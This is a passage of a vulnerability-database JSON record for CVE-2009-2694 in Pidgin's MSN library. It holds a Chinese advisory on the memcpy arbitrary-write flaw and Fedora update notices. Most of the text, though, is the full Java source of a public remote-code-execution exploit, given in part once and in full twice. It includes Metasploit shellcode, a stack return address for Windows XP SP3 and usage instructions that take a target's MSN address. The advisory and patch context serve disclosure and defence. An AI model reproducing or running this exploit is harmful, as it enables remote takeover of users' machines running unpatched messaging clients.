messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:19:36", "description": "CVE(CAN) ID: CVE-2009-2694\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002 \r\n\r\nPidgin\u548c\u5176\u4ed6\u4e00\u4e9b\u5373\u65f6\u6d88\u606f\u5ba2\u6237\u7aef\u6240\u4f7f\u7528\u7684Libpurple\u5e93\u4e2d\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u804a\u5929\u5ba2\u6237\u7aef\u53d1\u9001\u7279\u5236\u7684MSNSLP\u62a5\u6587\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u653b\u51fb\u9700\u8981\u53d1\u9001\u4e24\u4e2a\u8fde\u7eed\u7684MSNSLP\u6d88\u606f\uff0c\u7b2c\u4e00\u4e2a\u7528\u4e8e\u5bf9slpmsg\u5b58\u50a8\u4f1a\u8bddid\uff0c\u7b2c\u4e8c\u4e2a\u7528\u4e8e\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6700\u7ec8\u76ee\u6807\u662f\u5230\u8fbemsn_slplink_process_msg()\u4e2d\u7684memcpy()\u8c03\u7528\u3002\u9700\u8981\u521b\u5efa\u504f\u79fb\u4e3a\u975e0\u7684MSNSLP\u6d88\u606f\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u503c\u662fmemcpy()\u7684\u76ee\u6807\u3002\r\n\r\n\u56e0\u4e3a\u504f\u79fb\u975e0\uff0c\u6240\u4ee5\u5728\u8c03\u7528msn_slplink_message_find()\u8fd4\u56deNULL\u65f6\u4f1a\u51fa\u73b0\u7b2c\u4e00\u4e2a\u95ee\u9898\uff1a\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n\u56e0\u6b64\uff0cslpmsg\u5fc5\u987b\u4e3a\u975e\u7a7a\uff0c\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u9700\u8981\u53d1\u9001\u4e24\u6b21\u6d88\u606f\u624d\u80fd\u8fdb\u884c\u653b\u51fb\u3002\u53d1\u9001\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u504f\u79fb\u4e3a0\uff0c\u7528\u4e8e\u521b\u5efaslpmsg\u5bf9\u8c61\uff0cLibpurple\u4f1a\u5b58\u50a8\u8fd9\u4e2a\u5bf9\u8c61\uff1b\u7b2c\u4e8c\u4e2aMSNSLP\u6d88\u606f\u7684\u504f\u79fb\u975e0\uff0c\u4f46\u7531\u4e8eLibpurple\u5df2\u7ecf\u5b58\u50a8\u4e86\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\uff0c\u56e0\u6b64\u8c03\u7528msn_slplink_message_find()\u4f1a\u6709\u6548\u7684\u8fd4\u56de\u4e4b\u524d\u7684\u5bf9\u8c61\u800c\u4e0d\u662fNULL\uff1a\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset='' + len='') > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n\u4f8b\u5982\uff0c\u5982\u679c\u521b\u5efa\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u5927\u5c0f\u4e3a0x01ffffff\uff0c\u7b2c\u4e8c\u4e2a\u6d88\u606f\u7684\u504f\u79fb\u4e3a\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u503c\uff0c\u5c31\u6ee1\u8db3\u4e86\u4efb\u610f\u5199\u5165\u7684\u6761\u4ef6\u3002\r\n\r\n\u6700\u540e\uff0c\u4ee5\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u504f\u79fb\u503c\u5230\u8fbe\u4e86memcpy()\uff0c\u7f13\u51b2\u533a\u6307\u54110\u3002\u8fd9\u610f\u5473\u7740\u53ef\u4ee5\u5411\u4f4e\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u4f4d\u7f6e\u5199\u5165\u6570\u636e\u5185\u5bb9\u3002\n\nRob Flynn Gaim >= 0.79\r\nPidgin Pidgin 2.5.8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1218-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1218-01\uff1aCritical: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2009-1218.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.pidgin.im/news/security/?id=34", "published": "2009-08-21T00:00:00", "title": "Pidgin Libpurple\u5e93msn_slplink_process_msg()\u51fd\u6570\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12092", "id": "SSV:12092", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:37:23", "description": "No description provided by source.", "published": "2009-09-11T00:00:00", "title": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2009-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12249", "id": "SSV:12249", "sourceData": "\n /*\r\n* Pidgin MSN <= 2.5.8 Remote Code Execution\r\n*\r\n* Pierre Nogues - pierz@hotmail.it\r\n* http://www.indahax.com/\r\n*\r\n*\r\n* Description:\r\n* Pidgin is a multi-protocol Instant Messenger.\r\n*\r\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\r\n* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets\r\n* which could lead to memory corruption.\r\n*\r\n* Affected versions :\r\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n*\r\n* Plateforms :\r\n* Windows, Linux, Mac\r\n*\r\n* Fix :\r\n* Fixed in Pidgin 2.5.9\r\n* Update to the latest version : http://www.pidgin.im/download/\r\n*\r\n* References :\r\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\r\n* [3] http://www.pidgin.im/news/security/?id=34\r\n*\r\n* Usage :\r\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\r\n* javac.exe -cp "%classpath%;.\\jml-1.0b3-full.jar" PidginExploit.java\r\n* java -cp "%classpath%;.\\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\r\n*\r\n*/\r\n\r\nimport net.sf.jml.*;\r\nimport net.sf.jml.event.*;\r\nimport net.sf.jml.impl.*;\r\nimport net.sf.jml.message.p2p.*;\r\nimport net.sf.jml.util.*;\r\n\r\npublic class PidginExploit {\r\n\r\n private MsnMessenger messenger;\r\n private String login;\r\n private String password;\r\n private String target;\r\n\r\n private int session_id = NumberUtils.getIntRandom();\r\n\r\n private byte shellcode[] = new byte[] {\r\n\r\n /*\r\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\r\n * sub esp,500\r\n */\r\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\r\n\r\n\r\n /*\r\n * windows/exec - 121 bytes\r\n * http://www.metasploit.com\r\n * EXITFUNC=process, CMD=calc.exe\r\n */\r\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\r\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\r\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\r\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\r\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\r\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\r\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\r\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\r\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\r\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\r\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\r\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\r\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\r\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\r\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\r\n (byte) 0x00\r\n };\r\n\r\n // reteip = pointer to the return address in the stack\r\n // The shellcode will be wrote just before reteip\r\n // and reteip will automaticly point to the shellcode. It's magic !\r\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\r\n\r\n private int neweip;\r\n private byte[] payload = new byte[shellcode.length + 4];\r\n private int totallength = reteip + 4;\r\n\r\n public static void main(String[] args) throws Exception {\r\n\r\n if(args.length != 3){\r\n System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");\r\n }else{\r\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\r\n exploit.start();\r\n }\r\n\r\n }\r\n\r\n public PidginExploit(String login, String password, String target){\r\n this.login = login;\r\n this.password = password;\r\n this.target = target;\r\n\r\n neweip = reteip - shellcode.length ;\r\n\r\n for(int i=0;i<shellcode.length;i++)\r\n payload[i] = shellcode[i];\r\n\r\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\r\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\r\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\r\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\r\n }\r\n\r\n public void start() {\r\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\r\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\r\n\r\n messenger.setLogIncoming(false);\r\n messenger.setLogOutgoing(false);\r\n\r\n initMessenger(messenger);\r\n messenger.login();\r\n }\r\n\r\n protected void initMessenger(MsnMessenger messenger) {\r\n\r\n messenger.addContactListListener(new MsnContactListAdapter() {\r\n\r\n public void contactListInitCompleted(MsnMessenger messenger) {\r\n\r\n final Object id = new Object();\r\n\r\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\r\n\r\n public void switchboardStarted(MsnSwitchboard switchboard) {\r\n\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n switchboard.inviteContact(Email.parseStr(target));\r\n }\r\n\r\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\r\n msg.setIdentifier(NumberUtils.getIntRandom());\r\n msg.setSessionId(session_id);\r\n msg.setOffset(0);\r\n msg.setTotalLength(totallength);\r\n msg.setCurrentLength(totallength);\r\n\r\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\r\n // We'll use this buffer to rewrite memory in the stack\r\n msg.setFlag(0x1000020);\r\n\r\n msg.setP2PDest(target);\r\n\r\n switchboard.sendMessage(msg);\r\n\r\n System.out.println("First packet sent, waiting for the ACK");\r\n\r\n }\r\n\r\n public void switchboardClosed(MsnSwitchboard switchboard) {\r\n System.out.println("switchboardClosed");\r\n switchboard.getMessenger().removeSwitchboardListener(this);\r\n }\r\n\r\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\r\n System.out.println("contactLeaveSwitchboard");\r\n }\r\n });\r\n messenger.newSwitchboard(id);\r\n }\r\n });\r\n\r\n messenger.addMessageListener(new MsnMessageAdapter(){\r\n\r\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\r\n\r\n //We receive the ACK of our first packet with the ID of the new bogus packet\r\n message.getIdentifier();\r\n\r\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\r\n payload.length, payload, target);\r\n\r\n switchboard.sendMessage(msg);\r\n System.out.println("ACK received && Payload sent !");\r\n System.out.println("Exploit OK ! CTRL+C to quit");\r\n\r\n }\r\n });\r\n\r\n\r\n\r\n messenger.addMessengerListener(new MsnMessengerAdapter() {\r\n\r\n public void loginCompleted(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " login");\r\n }\r\n\r\n public void logout(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " logout");\r\n }\r\n\r\n public void exceptionCaught(MsnMessenger messenger,\r\n Throwable throwable) {\r\n System.out.println("caught exception: " + throwable);\r\n }\r\n });\r\n\r\n }\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12249"}, {"lastseen": "2017-11-19T14:11:42", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66870", "id": "SSV:66870", "sourceData": "\n /*\r\n* Pidgin MSN <= 2.5.8 Remote Code Execution\r\n*\r\n* Pierre Nogues - pierz@hotmail.it\r\n* http://www.indahax.com/\r\n*\r\n*\r\n* Description:\r\n* Pidgin is a multi-protocol Instant Messenger.\r\n*\r\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\r\n* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets\r\n* which could lead to memory corruption.\r\n*\r\n* Affected versions :\r\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n*\r\n* Plateforms :\r\n* Windows, Linux, Mac\r\n*\r\n* Fix :\r\n* Fixed in Pidgin 2.5.9\r\n* Update to the latest version : http://www.pidgin.im/download/\r\n*\r\n* References :\r\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\r\n* [3] http://www.pidgin.im/news/security/?id=34\r\n*\r\n* Usage :\r\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\r\n* javac.exe -cp "%classpath%;.\\jml-1.0b3-full.jar" PidginExploit.java\r\n* java -cp "%classpath%;.\\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\r\n*\r\n*/\r\n\r\nimport net.sf.jml.*;\r\nimport net.sf.jml.event.*;\r\nimport net.sf.jml.impl.*;\r\nimport net.sf.jml.message.p2p.*;\r\nimport net.sf.jml.util.*;\r\n\r\npublic class PidginExploit {\r\n\r\n private MsnMessenger messenger;\r\n private String login;\r\n private String password;\r\n private String target;\r\n\r\n private int session_id = NumberUtils.getIntRandom();\r\n\r\n private byte shellcode[] = new byte[] {\r\n\r\n /*\r\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\r\n * sub esp,500\r\n */\r\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\r\n\r\n\r\n /*\r\n * windows/exec - 121 bytes\r\n * http://www.metasploit.com\r\n * EXITFUNC=process, CMD=calc.exe\r\n */\r\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\r\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\r\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\r\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\r\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\r\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\r\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\r\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\r\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\r\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\r\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\r\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\r\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\r\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\r\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\r\n (byte) 0x00\r\n };\r\n\r\n // reteip = pointer to the return address in the stack\r\n // The shellcode will be wrote just before reteip\r\n // and reteip will automaticly point to the shellcode. It's magic !\r\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\r\n\r\n private int neweip;\r\n private byte[] payload = new byte[shellcode.length + 4];\r\n private int totallength = reteip + 4;\r\n\r\n public static void main(String[] args) throws Exception {\r\n\r\n if(args.length != 3){\r\n System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");\r\n }else{\r\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\r\n exploit.start();\r\n }\r\n\r\n }\r\n\r\n public PidginExploit(String login, String password, String target){\r\n this.login = login;\r\n this.password = password;\r\n this.target = target;\r\n\r\n neweip = reteip - shellcode.length ;\r\n\r\n for(int i=0;i<shellcode.length;i++)\r\n payload[i] = shellcode[i];\r\n\r\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\r\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\r\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\r\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\r\n }\r\n\r\n public void start() {\r\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\r\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\r\n\r\n messenger.setLogIncoming(false);\r\n messenger.setLogOutgoing(false);\r\n\r\n initMessenger(messenger);\r\n messenger.login();\r\n }\r\n\r\n protected void initMessenger(MsnMessenger messenger) {\r\n\r\n messenger.addContactListListener(new MsnContactListAdapter() {\r\n\r\n public void contactListInitCompleted(MsnMessenger messenger) {\r\n\r\n final Object id = new Object();\r\n\r\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\r\n\r\n public void switchboardStarted(MsnSwitchboard switchboard) {\r\n\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n switchboard.inviteContact(Email.parseStr(target));\r\n }\r\n\r\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\r\n if (id != switchboard.getAttachment())\r\n return;\r\n\r\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\r\n msg.setIdentifier(NumberUtils.getIntRandom());\r\n msg.setSessionId(session_id);\r\n msg.setOffset(0);\r\n msg.setTotalLength(totallength);\r\n msg.setCurrentLength(totallength);\r\n\r\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\r\n // We'll use this buffer to rewrite memory in the stack\r\n msg.setFlag(0x1000020);\r\n\r\n msg.setP2PDest(target);\r\n\r\n switchboard.sendMessage(msg);\r\n\r\n System.out.println("First packet sent, waiting for the ACK");\r\n\r\n }\r\n\r\n public void switchboardClosed(MsnSwitchboard switchboard) {\r\n System.out.println("switchboardClosed");\r\n switchboard.getMessenger().removeSwitchboardListener(this);\r\n }\r\n\r\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\r\n System.out.println("contactLeaveSwitchboard");\r\n }\r\n });\r\n messenger.newSwitchboard(id);\r\n }\r\n });\r\n\r\n messenger.addMessageListener(new MsnMessageAdapter(){\r\n\r\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\r\n\r\n //We receive the ACK of our first packet with the ID of the new bogus packet\r\n message.getIdentifier();\r\n\r\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\r\n payload.length, payload, target);\r\n\r\n switchboard.sendMessage(msg);\r\n System.out.println("ACK received && Payload sent !");\r\n System.out.println("Exploit OK ! CTRL+C to quit");\r\n\r\n }\r\n });\r\n\r\n\r\n\r\n messenger.addMessengerListener(new MsnMessengerAdapter() {\r\n\r\n public void loginCompleted(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " login");\r\n }\r\n\r\n public void logout(MsnMessenger messenger) {\r\n System.out.println(messenger.getOwner().getEmail() + " logout");\r\n }\r\n\r\n public void exceptionCaught(MsnMessenger messenger,\r\n Throwable throwable) {\r\n System.out.println("caught exception: " + throwable);\r\n }\r\n });\r\n\r\n }\r\n}\r\n\r\n// milw0rm.com [2009-09-09]\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66870"}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-08-20T21:02:03", "published": "2009-08-20T21:02:03", "id": "FEDORA:0F46A10F89C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: pidgin-2.6.0-1.fc11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "description": "Pidgin allows you to talk to anyone using a variety of messaging protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu, ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor. Pidgin supports many common features of other clients, as well as many unique features, such as perl scripting, TCL scripting and C plugins. Pidgin is not affiliated with or endorsed by America Online, Inc., Microsoft Corporation, Yahoo! Inc., or ICQ Inc. ", "modified": "2009-08-22T01:05:56", "published": "2009-08-22T01:05:56", "id": "FEDORA:1A97710F881", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: pidgin-2.6.1-1.fc11", "cvss": {"score": 10.0, "vector": 